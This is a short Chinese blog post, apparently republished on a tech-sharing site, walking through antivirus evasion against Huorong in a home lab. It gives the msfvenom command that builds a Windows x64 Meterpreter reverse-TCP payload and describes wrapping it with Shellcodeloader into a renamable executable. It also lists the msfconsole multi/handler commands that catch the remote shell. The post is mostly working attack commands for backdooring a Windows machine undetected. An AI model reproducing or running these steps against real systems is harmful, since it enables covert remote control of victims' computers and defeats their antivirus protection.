标签：上线 免杀 kali 0.119 192.168 火绒 set Shellcodeloader

题记

今天脑子里面蹦出来个想法，免杀木马然后cs上线，本来想让cs与msf联动的，但是出了点小问题，还是先研究免杀火绒吧。

环境

Kali：192.168.0.119 win10:192.168.0.200

工具地址：https://github.com/knownsec/shellcodeloader

步骤

1、在kali生成3.bin木马。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

2、把木马移到工具上做免杀。

生成loder.exe软件，可随意改名，运行就能上线。

3、kali开启监听。

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.0.119

exploit

然后运行exe

上线

4、火绒检测

软件运行后检测。

标签：上线,免杀,kali,0.119,192.168,火绒,set,Shellcodeloader
来源： https://www.cnblogs.com/sunny11/p/14105624.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。